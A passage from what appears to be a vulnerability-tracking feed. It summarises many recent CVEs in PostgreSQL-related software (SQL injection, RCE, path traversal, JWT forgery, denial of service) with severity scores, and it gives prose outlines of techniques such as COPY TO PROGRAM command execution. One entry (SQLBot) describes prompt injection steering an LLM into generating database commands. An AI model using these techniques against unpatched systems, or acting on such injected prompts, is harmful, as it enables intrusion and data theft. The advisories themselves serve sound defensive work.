This replaces the existing `getLanguageCode` method in `packages/core/src/service/helpers/request-context/request-context.service.ts`. Invalid values are silently dropped and the channel's default language is used instead. The patched versions additionally convert the vulnerable SQL interpolation to a parameterized query as defense in depth.

SQLi PostgreSQL
NVD GitHub
CVSS 3.1
9.1
EPSS
4.6%
CVE-2026-39842 Maven CRITICAL PATCH GHSA Act Now

Remote code execution as root in OpenRemote IoT platform's rules engine (versions prior to 1.20.3) allows authenticated non-superuser attackers with write:rules role to execute arbitrary Java code via unsandboxed JavaScript rulesets. The vulnerability stems from Nashorn ScriptEngine.eval() executing user-supplied JavaScript without ClassFilter restrictions, enabling Java.type() access to any JVM class including java.lang.Runtime. Attackers can compromise the entire multi-tenant platform, steal c

RCE Java Information Disclosure Docker PostgreSQL +5
NVD GitHub
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-40258 PyPI CRITICAL PATCH GHSA Act Now

Path traversal (Zip Slip) in gramps-web-api media archive import allows authenticated owner-privileged users to write arbitrary files outside intended directories via malicious ZIP archives. Exploitation requires owner-level access and enables cross-tree data corruption in multi-tree SQLite deployments or config file overwrite in volume-mounted configurations. Postgres+S3 deployments limit impact to ephemeral container storage. No public exploit identified at time of analysis.

Python Docker Path Traversal PostgreSQL
NVD GitHub
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-34977 CRITICAL PATCH Act Now

Unauthenticated remote code execution (RCE) at root level in Aperi'Solve <3.2.1 allows attackers to execute arbitrary commands via unsanitized password input in JPEG upload functionality. Attack requires no authentication (PR:N) and low complexity (AC:L), with CVSS 9.3 critical severity. Publicly available exploit code exists via GitHub advisory. Attackers gain full container compromise with potential pivot to PostgreSQL/Redis databases and, in misconfigured deployments with Docker socket mounts, possible host system takeover. EPSS data not provided, but given unauthenticated network-based vector and public disclosure with fix details, exploitation risk is substantial for exposed instances.

Docker PostgreSQL Command Injection Redis
NVD GitHub VulDB
CVSS 4.0
9.3
EPSS
0.1%
CVE-2026-34612 CRITICAL Act Now

SQL injection in Kestra orchestration platform's flow search endpoint (GET /api/v1/main/flows/search) enables remote code execution on the underlying PostgreSQL host. Authenticated users can trigger the vulnerability by visiting a malicious link, exploiting PostgreSQL's COPY TO PROGRAM feature to execute arbitrary OS commands on the Docker container host. Affects Kestra versions prior to 1.3.7 in default docker-compose deployments. With CVSS 9.9 (Critical) and low attack complexity requiring only low-privilege authentication, this represents a severe risk for container escape and host compromise scenarios.

RCE Docker SQLi PostgreSQL
NVD GitHub VulDB
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-34950 npm CRITICAL PATCH GHSA Act Now

JWT algorithm confusion in fast-jwt npm package allows remote attackers to forge authentication tokens with arbitrary claims by exploiting incomplete CVE-2023-48223 remediation. The vulnerability (CVSS 9.1 Critical) affects applications using RS256 with public keys containing leading whitespace, a common scenario in database-stored keys, YAML configurations, and environment variables. Attackers possessing the RSA public key (inherently public information) can craft HS256 tokens accepted as valid

RCE Python PostgreSQL
NVD GitHub
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-34825 npm HIGH PATCH GHSA This Week

{{$context.data.fieldName}}) directly into raw SQL statements, enabling attackers to break out of string literals and inject malicious SQL commands. Publicly available exploit code exists demonstrating UNION-based injection to extract database credentials and system information. With default Docker deployments granting superuser database privileges, attackers gain full read/write access to the database including credential extraction, data modification, and table deletion capabilities.

Docker SQLi PostgreSQL Debian
NVD GitHub
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-34725 npm HIGH PATCH GHSA This Week

Stored XSS in DbGate npm package escalates to remote code execution in Electron desktop app via unsanitized SVG icon rendering. Attackers who inject malicious SVG payloads into application definition files can execute arbitrary JavaScript when victims view matching database entries. In the Electron desktop client, insecure configuration (nodeIntegration: true, contextIsolation: false) allows XSS payloads to invoke Node.js APIs, enabling local code execution including file system access. Web depl

XSS RCE PostgreSQL
NVD GitHub
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-34455 HIGH PATCH This Week

SQL injection in Hi.Events open-source event management platform (versions 0.8.0-beta.1 through 1.7.0-beta) allows remote unauthenticated attackers to execute arbitrary SQL queries via unsanitized sort_by parameters passed to Eloquent's orderBy() method. The PostgreSQL backend supports stacked queries, enabling multi-statement injection. While CVSS 8.7 reflects high confidentiality impact and no authentication requirement, no public exploit code or CISA KEV listing exists at time of analysis. Vendor-released patch available in version 1.7.1-beta.

SQLi PostgreSQL
NVD GitHub
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-34400 PyPI MEDIUM PATCH GHSA This Month

SQL injection in Alerta's Query string search API (q= parameter) allows unauthenticated remote attackers to execute arbitrary SQL commands against the underlying PostgreSQL database. The vulnerability stems from unsafe f-string interpolation of user-supplied search terms directly into SQL WHERE clauses without parameterization. Alerta versions prior to 9.1.0 are affected; the vulnerability has been patched in version 9.1.0 with no public exploit code identified at time of analysis.

SQLi PostgreSQL
NVD GitHub
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-29953 HIGH This Week

SQL injection in SchemaHero 0.23.0 allows remote attackers to execute arbitrary SQL commands through the column parameter in the columnAsInsert function within the PostgreSQL plugin, potentially compromising database integrity and confidentiality. Public exploit documentation is available, indicating proof-of-concept code exists. CVSS and EPSS data are unavailable, limiting formal severity quantification.

SQLi PostgreSQL
NVD GitHub VulDB
CVSS 3.1
7.4
EPSS
0.0%
CVE-2026-32286 Go HIGH PATCH GHSA This Week

DataRow.Decode in github.com/jackc/pgproto3/v2 fails to validate field length parameters, allowing a malicious or compromised PostgreSQL server to send a DataRow message with a negative field length that triggers a slice bounds out of range panic in Go applications using this library. Affected applications experience denial of service through unexpected termination when connecting to an untrusted or compromised database server. No public exploit code or active exploitation has been confirmed; however, the attack requires only network access to a PostgreSQL endpoint that the vulnerable application connects to.

Information Disclosure PostgreSQL Red Hat Suse
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-33713 npm HIGH POC PATCH This Week

SQL injection in n8n's Data Table Get node allows authenticated users with workflow modification permissions to execute arbitrary SQL queries against PostgreSQL backends, enabling data modification and deletion. Public exploit code exists for this vulnerability. Affected versions prior to 1.123.26, 2.13.3, and 2.14.1 should be upgraded immediately, or workflow creation/editing permissions should be restricted to trusted users only.

SQLi PostgreSQL
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-33663 npm HIGH POC PATCH This Week

n8n workflow automation platform Community Edition contains an authorization bypass vulnerability allowing authenticated users with member-level privileges to steal plaintext credentials from other users. The flaw chains name-based credential resolution that doesn't enforce ownership with a permissions bypass affecting generic HTTP credential types (httpBasicAuth, httpHeaderAuth, httpQueryAuth). Attackers can decrypt and exfiltrate credentials without authorization, though native integration credentials remain unaffected.

Authentication Bypass PostgreSQL
NVD GitHub VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-33539 npm HIGH PATCH This Week

Parse Server versions prior to 8.6.59 and 9.6.0-alpha.53 contain a SQL injection vulnerability in PostgreSQL aggregate operations that allows attackers with master key access to execute arbitrary SQL statements, escalating from application-level administrator privileges to database-level access. Only PostgreSQL-backed Parse Server deployments are affected; MongoDB deployments are not vulnerable. No CVSS score or EPSS data is currently available, and no KEV or active exploitation reports have been confirmed at this time.

Privilege Escalation SQLi PostgreSQL Node.js
NVD GitHub VulDB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2026-33442 npm HIGH PATCH This Week

SQL injection in PostgreSQL via unsafe backslash handling in Kysely's query compiler allows unauthenticated remote attackers to execute arbitrary SQL commands by injecting backslashes into JSON path string literals that bypass quote escaping. The vulnerability affects systems using the default BACKSLASH_ESCAPES SQL mode, where attackers can break out of sanitized JSON path expressions through specially crafted input. No patch is currently available.

SQLi PostgreSQL
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-32950 HIGH PATCH This Week

SQLBot, an intelligent data query system based on large language models and RAG, contains a critical SQL injection vulnerability in the /api/v1/datasource/uploadExcel endpoint that allows authenticated users with minimal privileges to achieve remote code execution on the backend server. SQLBot versions prior to 1.7.0 are affected, and attackers can exploit unsafe concatenation of Excel sheet names into PostgreSQL table names and COPY statements to inject malicious SQL commands. The vulnerability enables arbitrary command execution as the postgres user, database takeover, and sensitive file exfiltration including /etc/passwd and /etc/shadow.

RCE SQLi PostgreSQL Command Injection
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-32622 HIGH PATCH This Week

Remote code execution in SQLBot 1.5.0 and below allows authenticated users to inject malicious prompts through unsanitized terminology uploads, enabling attackers to manipulate the LLM into generating arbitrary PostgreSQL commands executed with database privileges. The vulnerability stems from missing permission checks on the Excel upload API combined with inadequate semantic isolation when injecting user-controlled data into the system prompt. An attacker can exploit this to achieve code execution on the database or application server running as the postgres user.

Authentication Bypass RCE PostgreSQL
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.6%
CVE-2026-4427 Go HIGH PATCH GHSA This Week

PostgreSQL client applications using the pgproto3 Go library (github.com/jackc/pgproto3/v2) can be crashed remotely by malicious or compromised PostgreSQL servers sending specially crafted DataRow messages with negative field lengths, triggering slice bounds panics that result in denial of service. The vulnerability requires no authentication and has low attack complexity (CVSS:3.1/AV:N/AC:L/PR:N/UI:N), though the EPSS score of 0.07% (20th percentile) suggests minimal observed exploitation activity. Multiple detailed technical advisories exist including analysis from Security Infinity, and the issue is tracked in GitHub issue #2507 for the pgx project.

Buffer Overflow Denial Of Service PostgreSQL Suse
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-33142 npm HIGH PATCH This Week

SQL injection in PostgreSQL StatementGenerator allows authenticated attackers to execute arbitrary SQL commands through unsanitized object keys in sort, select, and groupBy parameters on analytics endpoints. The vulnerability exists because column name validation was incompletely applied during a previous fix, leaving three query construction methods vulnerable to direct identifier injection. An attacker with valid credentials can exploit this to access or manipulate database contents without requiring user interaction.

SQLi PostgreSQL
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-32763 npm HIGH PATCH This Week

Kysely through version 0.28.11 contains a SQL injection vulnerability in JSON path compilation affecting MySQL and SQLite dialects. The visitJSONPathLeg() function appends user-controlled values from .key() and .at() methods directly into single-quoted JSON path string literals without escaping single quotes, enabling attackers to break out of the string context and inject arbitrary SQL. A working proof-of-concept demonstrates UNION-based data exfiltration from SQLite databases. The vulnerability has CVSS score 8.2 and patches are available from the vendor.

SQLi PostgreSQL
NVD GitHub VulDB
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-32747 Go MEDIUM PATCH This Month

Administrative users of Docker and PostgreSQL deployments can exploit an incomplete path validation in the `POST /api/file/globalCopyFiles` endpoint to copy sensitive files like container environment variables and Docker secrets from restricted locations (`/proc/`, `/run/secrets/`) into the workspace, where they become readable via standard file APIs. The vulnerability stems from reliance on a blocklist-based validation mechanism that fails to prevent access to these critical system paths. Since no patch is currently available, organizations should restrict administrative access to the affected API endpoint until an update is released.

Docker Path Traversal PostgreSQL Suse
NVD GitHub VulDB
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-4191 MEDIUM POC This Month

A critical unrestricted file upload vulnerability exists in the Profile Picture Handler component of JawherKl's node-api-postgres library (versions up to 2.5), where improper validation in the path.extname function of index.js allows attackers to upload malicious files remotely without authentication. A proof-of-concept exploit is publicly available, making this vulnerability actively exploitable, though it is not currently listed in CISA's KEV catalog and no EPSS score is provided.

PostgreSQL File Upload
NVD VulDB
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-4190 MEDIUM POC This Month

SQL injection in the User.getAll function of node-api-postgres up to version 2.5 allows remote attackers to manipulate the sort parameter and execute arbitrary SQL commands. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early disclosure notification. Affected deployments using PostgreSQL with the vulnerable Node.js API library face risks of unauthorized data access, modification, and potential service disruption.

SQLi PostgreSQL
NVD VulDB
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-32628 HIGH This Week

SQL injection in AnythingLLM versions 1.11.1 and earlier enables authenticated users to execute arbitrary SQL commands against connected PostgreSQL, MySQL, and MSSQL databases through the built-in SQL Agent plugin. The vulnerability stems from unsafe string concatenation of table names in the getTableSchemaSql() method across all three database connectors, bypassing proper parameterization. Any user with access to invoke the SQL Agent can exploit this to read, modify, or delete sensitive database contents.

Information Disclosure SQLi PostgreSQL MySQL MSSQL +2
NVD GitHub
CVSS 4.0
7.7
EPSS
0.0%
CVE-2026-32248 npm CRITICAL POC PATCH Act Now

Unauthenticated query injection in Parse Server before 9.6.0-alpha.12/8.6.38. PoC available.

Information Disclosure PostgreSQL Node.js Parse Server
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-21708 CRITICAL Act Now

Veeam Backup & Replication allows a user with the Backup Viewer role (read-only) to escalate to remote code execution as the postgres database user. A read-only role achieving RCE represents a severe privilege escalation with scope change.

RCE SQLi PostgreSQL
NVD VulDB
CVSS 3.1
9.9
EPSS
0.5%
CVE-2026-32234 npm MEDIUM PATCH This Month

An attacker with access to the master key can inject malicious SQL via crafted field names used in query constraints when Parse Server is configured with PostgreSQL as the database. The field name in a `$regex` query operator is passed to PostgreSQL using unparameterized string interpolation, allowing the attacker to manipulate the SQL query. While the master key controls what can be done through the Parse Server abstraction layer, this SQL injection bypasses Parse Server entirely and operates at the database level. This vulnerability only affects Parse Server deployments using PostgreSQL. The fix applies proper SQL identifier escaping to field names in the query handler and hardens query field name validation to reject malicious field names for all query types. There is no known workaround. - GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-c442-97qw-j6c6 - Fix Parse Server 9: https://github.com/parse-community/parse-server/releases/tag/9.6.0-alpha.10 - Fix Parse Server 8: https://github.com/parse-community/parse-server/releases/tag/8.6.36

SQLi PostgreSQL Node.js Parse Server
NVD GitHub VulDB
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-31872 npm HIGH PATCH This Week

Parse Server versions prior to 9.6.0-alpha.6 and 8.6.32 allow attackers to bypass class-level permission restrictions on protected fields by using dot-notation in query and sort parameters, enabling enumeration of sensitive field values through binary oracle attacks. This affects both MongoDB and PostgreSQL deployments and requires no authentication or user interaction. No patch is currently available for affected versions.

Authentication Bypass PostgreSQL Node.js Parse Server
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-31871 npm CRITICAL PATCH Act Now

SQL injection in Parse Server before 9.6.0-alpha.5/8.6.31. Third Parse Server SQLi.

SQLi PostgreSQL Node.js Parse Server
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-31856 npm CRITICAL PATCH Act Now

SQL injection in Parse Server before 9.6.0-alpha.5/8.6.31.

SQLi PostgreSQL Node.js Parse Server
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-31840 npm CRITICAL PATCH Act Now

SQL injection in Parse Server before 9.6.0-alpha.2/8.6.28.

SQLi PostgreSQL Node.js Parse Server
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2025-13957 CISA This Week

A CWE-798: Use of Hard-coded Credentials vulnerability exists that could cause information disclosure and remote code execution when SOCKS Proxy is enabled and the administrator credentials and PostgreSQL database credentials are known. SOCKS Proxy is disabled by default.

RCE Information Disclosure PostgreSQL
NVD
EPSS
0.3%
CVE-2026-25041 npm HIGH PATCH This Week

Command injection in Budibase 3.23.22 and earlier allows authenticated attackers with high privileges to execute arbitrary system commands by injecting malicious values into PostgreSQL connection parameters that are unsanitized in shell command construction. An attacker with administrative access can exploit this vulnerability to gain complete control over the underlying server hosting the Budibase instance. No patch is currently available for this vulnerability.

PostgreSQL Command Injection Budibase
NVD GitHub VulDB
CVSS 3.1
7.2
EPSS
0.0%
CVE-2026-30860 Go CRITICAL POC PATCH Act Now

SQL injection in WeKnora LLM document understanding framework allows authenticated users to extract arbitrary database contents. CVSS 9.9 with scope change. PoC available.

RCE SQLi PostgreSQL AI / ML Weknora +1
NVD GitHub
CVSS 3.1
9.9
EPSS
0.2%
CVE-2026-29089 HIGH This Week

Arbitrary code execution in TimescaleDB 2.23.0 through 2.25.1 allows local authenticated users to execute malicious functions by shadowing built-in PostgreSQL functions through user-writable schemas in the search_path setting during extension upgrades. An attacker with database access can create malicious functions in writable schemas that are invoked instead of legitimate PostgreSQL functions, resulting in code execution with database privileges. No patch is currently available for affected installations.

RCE PostgreSQL Red Hat Timescaledb Suse
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-27005 CRITICAL POC Act Now

SQL injection in Chartbrew before 4.8.3. PoC available.

PostgreSQL MySQL Chartbrew
NVD GitHub
CVSS 3.1
9.8
EPSS
0.2%
CVE-2026-26932 MEDIUM This Month

Packetbeat's PostgreSQL protocol parser improperly validates array indices, allowing authenticated attackers on the same network to crash the monitoring service by sending malicious packets. An attacker exploiting this denial-of-service vulnerability can terminate the Packetbeat process, disrupting monitoring capabilities on systems with PostgreSQL protocol monitoring enabled. No patch is currently available.

Denial Of Service PostgreSQL Golang Packetbeat
NVD
CVSS 3.1
5.7
EPSS
0.0%
CVE-2026-23984 PyPI MEDIUM PATCH This Month

Authenticated users in Apache Superset versions before 6.0.0 can execute write operations against PostgreSQL databases configured as read-only by crafting specially formatted SQL statements that evade validation checks. This allows an attacker with SQLLab access to perform unauthorized data modifications despite read-only protections being in place. No patch is currently available for affected versions.

Apache PostgreSQL Superset
NVD
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-23969 PyPI MEDIUM PATCH This Month

Insufficient SQL function restrictions in Apache Superset before 4.1.2 allow authenticated users to execute sensitive database functions on ClickHouse engines that should have been blocked. An attacker with database access could leverage the incomplete DISALLOWED_SQL_FUNCTIONS list to bypass security controls and potentially extract or manipulate data. No patch is currently available for affected versions of Apache Superset, PostgreSQL, and related deployments.

Apache PostgreSQL Superset
NVD
CVSS 3.1
6.5
EPSS
0.1%
CVE-2025-67305 CRITICAL Act Now

Hardcoded SSH keys in Ruckus Network Director OVA < 4.5.0.56 for postgres user. Same across all appliances.

Privilege Escalation PostgreSQL
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2025-67304 CRITICAL Act Now

Hardcoded PostgreSQL credentials in Ruckus Network Director OVA < 4.5.0.54.

Authentication Bypass PostgreSQL
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-25949 Go HIGH PATCH This Week

Denial of service in Traefik versions prior to 3.6.8 allows unauthenticated remote attackers to exhaust connection resources by exploiting improper timeout handling in STARTTLS request processing. An attacker can send a PostgreSQL SSLRequest prelude and then stall the connection indefinitely, bypassing the readTimeout protection and accumulating open connections until service availability is degraded. A patch is available in version 3.6.8.

Denial Of Service PostgreSQL Red Hat Traefik Suse
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-2007 HIGH PATCH This Week

Heap buffer overflow in the pg_trgm extension of PostgreSQL 18.0 and 18.1 allows authenticated database users to trigger memory corruption through specially crafted input strings. An attacker with database access could potentially achieve privilege escalation or cause service disruption, though exploit complexity is currently limited by restricted control over written data. No patch is currently available.

Privilege Escalation Buffer Overflow PostgreSQL Red Hat Suse
NVD
CVSS 3.1
8.2
EPSS
0.1%
Awaiting Data

Pre-NVD disclosure via the oss-security mailing list, 2026/05/15. Thread subjects: Security Advisory: Multiple Vulnerabilities in llama.cpp GGUF Format Parsers (135266653@...com); CVE-2026-35194: Apache Flink: Remote code execution via SQL injection in code generation (Martijn Visser <martijnvisser@...che.org>); libpng-apng: Chunk-smuggling vulnerability in push-mode APNG parser: CVE-2026-40930 (Cosmin Truta <ctruta@...il.com>); netatalk 4.4.3 fixes 20 CVEs, leaves 18 for later (Alan Coopersmith <alan.coopersmith@...cle.com>); PostgreSQL 18.4, 17.10, 16.14, 15.18, and 14.23 Released with security fixes (Alan Coopersmith <alan.coopersmith@...cle.com>); Poppy: XPC Observability & Fault Injecti

RCE Apache SQLi +1
NVD
CVSS 7.5
HIGH PATCH This Week

Denial of service in OpenTelemetry eBPF Instrumentation (OBI) versions prior to 0.9.0 allows remote attackers to crash the telemetry agent by sending a malformed Postgres BIND frame with an empty or unterminated portal name payload to any monitored service. The defect lives in OBI's passive Postgres protocol parser, where missing NUL-terminator validation causes a Go slice-bounds panic, halting telemetry collection on the affected node. Publicly available exploit code exists in the GHSA-pgvv-q3wf-mm9m advisory, though the issue is not listed in CISA KEV and EPSS data was not provided.

Denial Of Service Python Docker +1
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Authenticated users in Mathesar 0.2.0 through 0.9.x can access metadata for PostgreSQL databases where they lack collaborator privileges, due to missing authorization checks in four API methods (collaborators.list, tables.metadata.list, explorations.list, forms.list). Exposed data includes table schemas, saved explorations, form configurations, and critically, public form submission tokens that grant unauthorized database write access under the form's PostgreSQL role. Fixed in version 0.10.0. CVSS 5.3 (Medium) reflects network-accessible, low-complexity exploitation requiring only basic authentication. No public exploit code or active exploitation detected (EPSS data unavailable, not in CISA KEV).

Authentication Bypass PostgreSQL
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Broken access control in Mathesar 0.2.0 through 0.9.x allows authenticated users to read, modify, or delete saved explorations (database query definitions) in databases where they lack collaborator privileges. Exploitation requires only a valid user account and knowledge of an exploration ID - easily guessed or enumerated. Fixed in version 0.10.0. No public exploit identified at time of analysis, with EPSS data not available for this recently disclosed vulnerability.

Authentication Bypass PostgreSQL
NVD GitHub
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Budibase servers before version 3.38.1 allow any authenticated application user to modify datasource connection parameters through the REST API endpoint PUT /api/datasources/:datasourceId, which requires only basic TABLE/READ permissions instead of builder-level access. This authorization bypass enables attackers with minimal BASIC role privileges to redirect PostgreSQL, MySQL, MongoDB, or REST datasources to arbitrary hosts and ports, creating server-side request forgery (SSRF) conditions that bypass existing HTTP-layer protections for SQL driver connections. The vulnerability has been assigned CVSS 8.8 (High) and is fixed in Budibase 3.38.1.

Authentication Bypass Privilege Escalation PostgreSQL +2
NVD GitHub VulDB
EPSS 0% CVSS 8.5
HIGH This Week

Local privilege escalation in Rapid7 Metasploit Pro allows unprivileged Windows users to achieve SYSTEM-level execution via OpenSSL configuration file hijacking. The metasploitPostgreSQL service loads openssl.cnf from a non-existent directory writable by standard users, enabling arbitrary command execution with SYSTEM privileges. Rated CVSS 8.5 (High) with proof-of-concept exploitation status (E:P). EPSS data not yet available. Not currently listed in CISA KEV catalog, suggesting vendor-disclosed rather than observed in-the-wild exploitation at time of analysis.

Privilege Escalation PostgreSQL OpenSSL +1
NVD VulDB
CVSS 9.8
CRITICAL PATCH Act Now

SQL injection in Marten's PostgreSQL full-text search APIs allows remote unauthenticated attackers to execute arbitrary database commands when applications pass user-controlled input to the regConfig parameter. The vulnerability affects all five search method overloads (SearchAsync, PlainTextSearchAsync, PhraseSearchAsync, WebStyleSearchAsync, PrefixSearchAsync) where the regConfig parameter is interpolated directly into SQL without validation. Confirmed exploit payloads demonstrate time-based blind extraction, information disclosure via SELECT statements, and DDL execution including table drops. Vendor-released patch available in Marten 8.37.0 via GitHub PR #4343. No public exploit identified at time of analysis, though the advisory includes working proof-of-concept payloads for all affected methods.

Information Disclosure SQLi PostgreSQL
NVD GitHub
HIGH PATCH This Week

SQL injection in n8n's Source Control feature allows attackers with git repository write access to execute arbitrary SQL against the PostgreSQL backend when administrators pull malicious Data Table JSON files. The vulnerability requires a specific attack chain: attacker git repository access, Source Control feature enabled, PostgreSQL backend, and admin-triggered pull operation. Vendor-released patches are available across all affected version branches (1.x, 2.20.x, 2.21.x). No public exploit identified at time of analysis, and the multi-prerequisite exploitation path significantly limits real-world attack surface to supply chain or insider threat scenarios.

SQLi PostgreSQL
NVD GitHub
EPSS 0% CVSS 3.7
LOW PATCH Monitor

SQL injection in PostgreSQL logical replication ALTER SUBSCRIPTION REFRESH PUBLICATION allows authenticated local or network users with table creation privileges to execute arbitrary SQL queries with the publication subscriber's credentials. The attack is deferred until the next REFRESH PUBLICATION command is executed, requiring user interaction or scheduled maintenance. PostgreSQL 16.x, 17.x, and 18.x versions prior to 16.14, 17.10, and 18.4 respectively are vulnerable; earlier versions are unaffected. No public exploit code or active exploitation has been identified.

SQLi PostgreSQL
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Stack buffer overflow in PostgreSQL's refint module allows low-privileged database users to execute arbitrary code as the database operating system user across all supported versions before 14.23, 15.18, 16.14, 17.10, and 18.4. The vulnerability enables two distinct attack paths: direct stack overflow leading to OS-level code execution, and SQL injection when applications expose user-controlled columns configured as refint cascade primary keys. With CVSS 8.8 (AV:N/AC:L/PR:L) and network-based exploitation requiring only low-privilege database credentials, this represents a critical privilege escalation risk for PostgreSQL deployments. No active exploitation (CISA KEV) or public POC identified at time of analysis.

RCE Buffer Overflow SQLi +3
NVD VulDB
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Buffer over-read in PostgreSQL 18.0 through 18.3 allows authenticated table maintainers to infer sensitive memory contents by exploiting mismatched array lengths in the pg_restore_attribute_stats() function during query planning. The vulnerability requires authenticated database access and table maintenance privileges but enables information disclosure without modifying data or causing service disruption.

Buffer Overflow PostgreSQL Suse
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Denial of service in PostgreSQL allows remote unauthenticated attackers to crash the database server via recursive SSL/GSS negotiation when connecting to AF_UNIX or TCP sockets (if SSL and GSS are both disabled). Affects all PostgreSQL versions prior to 18.4, 17.10, 16.14, 15.18, and 14.23. No active exploitation confirmed (not in CISA KEV). Vendor-released patches available across all supported major versions. EPSS data not available, but CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicates high availability impact with low barrier to exploitation.

Denial Of Service PostgreSQL Suse
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Timing-channel attack in PostgreSQL MD5 password authentication enables remote unauthenticated attackers to extract user credentials through statistical analysis of authentication response times, affecting versions prior to 18.4, 17.10, 16.14, 15.18, and 14.23. The vulnerability exploits variable-time comparison operations during MD5 password hash verification, but does not impact the default scram-sha-256 authentication method. Databases migrated from PostgreSQL 13 or earlier may retain MD5-hashed passwords and remain vulnerable despite running newer versions.

Information Disclosure PostgreSQL Suse
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

PostgreSQL libpq client library allows malicious server superusers to execute arbitrary code on connecting clients by overwriting stack buffers via unbounded responses to PQfn() calls. The vulnerability affects lo_export(), lo_read(), lo_lseek64(), and lo_tell64() functions used by psql and pg_dump utilities. A compromised or malicious PostgreSQL server can exploit clients running these common administrative tools during routine operations like database backups or large object exports. EPSS and KEV data not available for this recent CVE. CVSS 8.8 reflects the network attack vector with user interaction requirement (connecting to malicious server).

Information Disclosure PostgreSQL Suse
NVD VulDB
EPSS 0% CVSS 7.2
HIGH PATCH This Week

SQL injection in PostgreSQL's pg_createsubscriber utility escalates privileges from pg_create_subscription to superuser, enabling arbitrary SQL execution. Affects PostgreSQL versions 17.0-17.9 and 18.0-18.3; exploitation requires high-privilege access (pg_create_subscription rights) but occurs remotely without additional complexity. Attack triggers when pg_createsubscriber next executes. Fixed in PostgreSQL 18.4 and 17.10. No CISA KEV listing or public exploit identified at time of analysis, but the technical simplicity (AC:L) and privilege escalation nature present moderate risk for multi-tenant or hosted PostgreSQL environments where subscription management permissions are delegated.

SQLi PostgreSQL Suse
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Symlink following vulnerabilities in PostgreSQL pg_basebackup and pg_rewind enable database superusers to overwrite arbitrary files on the destination server's filesystem, leading to local OS account takeover. Exploitation requires a malicious origin database superuser convincing an administrator to run these backup/replication tools (UI:R in CVSS), with practical impact limited to scenarios where database files are transferred between systems or snapshotted before server restart. No public exploit identified at time of analysis. CVSS 8.8 reflects theoretical severity, but real-world risk depends on specific operational workflows involving backup file transfers across trust boundaries.

Information Disclosure PostgreSQL Suse
NVD VulDB
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

Format string vulnerability in PostgreSQL timeofday() function allows authenticated remote attackers to read arbitrary server memory by supplying crafted timezone values. Affects PostgreSQL versions 14.x before 14.23, 15.x before 15.18, 16.x before 16.14, 17.x before 17.10, and 18.x before 18.4. The vulnerability enables information disclosure of sensitive data stored in process memory without code execution or data modification capabilities.

Information Disclosure PostgreSQL Red Hat +1
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution in PostgreSQL (versions 14.x-18.x) allows authenticated database users to execute arbitrary code as the database operating system user via integer wraparound vulnerabilities in multiple server features. By passing gigabyte-scale inputs to affected database functions, attackers trigger allocation undersizing that leads to out-of-bounds writes. No active exploitation confirmed (not in CISA KEV), but CVSS 8.8 with network vector and low complexity indicates high exploitability once technical details become public. EPSS data not available at time of analysis.

RCE PostgreSQL Integer Overflow +1
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Missing authorization in PostgreSQL CREATE TYPE allows authenticated users to hijack search_path resolution and force other database users to execute arbitrary SQL functions chosen by the attacker. An authenticated attacker can create a malicious user-defined type in a schema that appears earlier in a victim's search_path than legitimate extension or system types, causing the victim's queries to execute attacker-controlled functions instead of intended ones. This affects PostgreSQL versions 14.x before 14.23, 15.x before 15.18, 16.x before 16.14, 17.x before 17.10, and 18.x before 18.4. While CVSS 5.4 is moderate, the attack requires authenticated database access and carries real risk in multi-tenant or shared PostgreSQL environments where privilege escalation or lateral movement is the goal.

Authentication Bypass PostgreSQL Suse
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

